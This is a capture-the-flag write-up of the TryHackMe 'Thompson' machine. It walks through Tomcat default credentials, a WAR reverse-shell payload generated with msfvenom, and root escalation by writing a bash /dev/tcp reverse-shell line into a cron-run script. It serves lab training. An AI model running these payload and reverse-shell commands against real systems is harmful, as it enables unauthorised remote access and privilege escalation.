🐱{THM} Thompson

Introduction

Thompson is a TryHackMe machine originally for Bsides Guatemala.

Step 1 – Recon

As usual, scanning for any active port using nmap and waiting for the result.

From scanning result, notice that 3 port are open which ssh, ajp13 and http. Let proceed to scanning directory with additional port http.

Some interesting information here, as I know, manager directory is same as admin directory. Let check it out to proof our theory are right.

Step 2 – Gaining Access

This was landing page with port 8080. Looking around other resources, found that this version are out dated. Let search any exploitation we can do.

In meanwhile, let see manager directory first.

We don’t have yet any credentials. But something an usual happen. Whenever I submit cancellations button, it appears to have very sensitive information. Dangerous enough when misconfiguration happen.

Further research also found that this is default credentials for apache tomcat. HURM..

We in!!. Just like that.

Step 3 – Exploitation

The version of Tomcat installed on the remote host is prior to 8.5.x prior to 8.5.55. It is, therefore, affected by a remote code execution vulnerability as referenced in the fixed_in_apache_tomcat_8.5.55_security-8 advisory.

Since we can execute RCE, let find any upload from this site.

We found war file. But what was it?

a WAR file (Web Application Resource or Web application Archive) is a file used to distribute a collection of JAR-files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML and related files) and other resources that together constitute a web application.

Refer to hacktrick, we can create war file using msfvenom. Let create one and upload to the site.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<machine> LPORT=<port> -f war -o war2.war

-p use for create type of payload

-lhost is attacker machine

-lport is attacker port for listening

-f type of file

-o output file/file name.

Once done, let upload to website.

Proof that our file already uploaded into website. Next, fire up our listening and click the directory.

We manage to establish connections with our target.

Step 4 – Privilege Escalation.

As usual, before start, make sure your shell are stable. Once we done let enumerate more. I like to check this 3 command before proceeding more further

1. Crontab

2. Passwd

3. Home directory

We got good information here. Let check the profile and user. Luckily, we can read user flag without authentication for jack. Something weird. But never mind.

From my understanding, this id.sh will execute anything command given into root permissions. That means to escalate as root, we can throw reverse shell or just read the flag.

Copy File

echo " cp /root/root.txt /home/jack/r.txt " > id.sh

Wait for a while for cronjob to work. And we got our copy file.

Reverse Shell

echo “/bin/bash -i >& /dev/tcp/machine/4430 0>&1” > id.sh

We manage to get root privilege. Thank for reading.

Learning

1. Default credentials

2. Misconfiguration leads to sensitive data.

3. War file